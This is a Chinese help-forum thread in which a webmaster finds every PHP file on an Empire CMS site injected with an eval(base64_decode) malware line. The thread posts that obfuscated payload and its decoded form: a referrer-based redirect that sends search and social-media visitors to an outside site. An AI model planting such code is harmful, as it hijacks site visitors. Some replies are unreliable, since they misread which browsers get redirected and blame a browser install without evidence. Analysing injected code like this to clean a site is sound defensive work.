9
回答
帝国CMS网站被挂马,所有PHP文件均被加上eval(base64_decode代码,求高手分析。
终于搞明白,存储TCO原来是这样算的>>>   
帝国CMS网站被挂马,所有PHP文件均被加上eval(base64_decode代码,求高手分析。
<?php
       
 
 eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio/KVwvdXJsXD9zYS8iLCRyZWZlcmVyKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJteXNwYWNlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImZhY2Vib29rLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgewppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8va21scHMubXJzbG92ZS5jb20vIik7CmV4aXQoKTsKfQp9Cn0KfQp9"));
      

Header("Location:../");
?>

我所有的PHP文件都被加上了其中的一段代码,我想问下高手,这是不是帝国网站的漏斗问题,还是我服务器的问题!

如果是网站问题,那么应该如何去防止呢?

不好意思 我现在的财富值是0,不能悬赏 还望高手指点
<无标签>
举报
某评伽
发帖于5年前 9回/1K+阅
共有9个答案 最后回答: 4年前

估计是你服务器上的什么站点被旁注了。。

帝国的安全性来说还是做的不错的。 还有如何你不是在官方下的程序也有可能预告就被放了后门了。。

--- 共有 1 条评论 ---
某评伽我的服务器下还有discuz的程序,discux x2.5用漏洞吗? 如何检测 旁注 5年前 回复
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
	$referer=$_SERVER['HTTP_REFERER'];
	$uag=$_SERVER['HTTP_USER_AGENT'];
	if ($uag) {
		if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
			if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
				if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
					header("Location: http://kmlps.mrslove.com/");
					exit();
				}
			}
		}
	}
}
就是这段
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://kmlps.mrslove.com/");
exit();
}
}
}
}
}
--- 共有 2 条评论 ---
某评伽我知道了 是解码出来的,我想知道怎么解决呀 5年前 回复
某评伽是php代码里面有这段吗 ,去掉这段? 5年前 回复

如果来自yahoo,bing,AOL,yandex,facebook等等大网站的流量

而求浏览器是IE6,7的

那么repsond将导致浏览器打开http://kmlps.mrslove.com/


不懂PHP,不懂WEB,只懂HTTP。错了莫怪~ 目测,是老毛子搞的

--- 共有 1 条评论 ---
某评伽没错 ,但可惜只是解码,我想知道是怎么产生的 5年前 回复
公司php站遇到同样问题,怀疑是360浏览器搞的,年后回来发现服务器安装了360浏览器,然后出现此问题,恢复360浏览器安装之前的状态解决,期待高手拿到证据

服务器的话,不要装360的任何东西

另外这类开源程序一般都很安全,你还是要从服务器安全性下手

确实是挂马。同时也说明网站存在漏洞,被黑客利用了。单纯的删除效果不好,最好对网站进行全站扫描,进行漏洞修复。如果网站价值较高,建议找专业的安全公司来解决。如果你的网站模板是比较常用的下载模板,建议升级到模板的最新版本。国内也就Sinesafe和绿盟等安全公司 比较专业.
顶部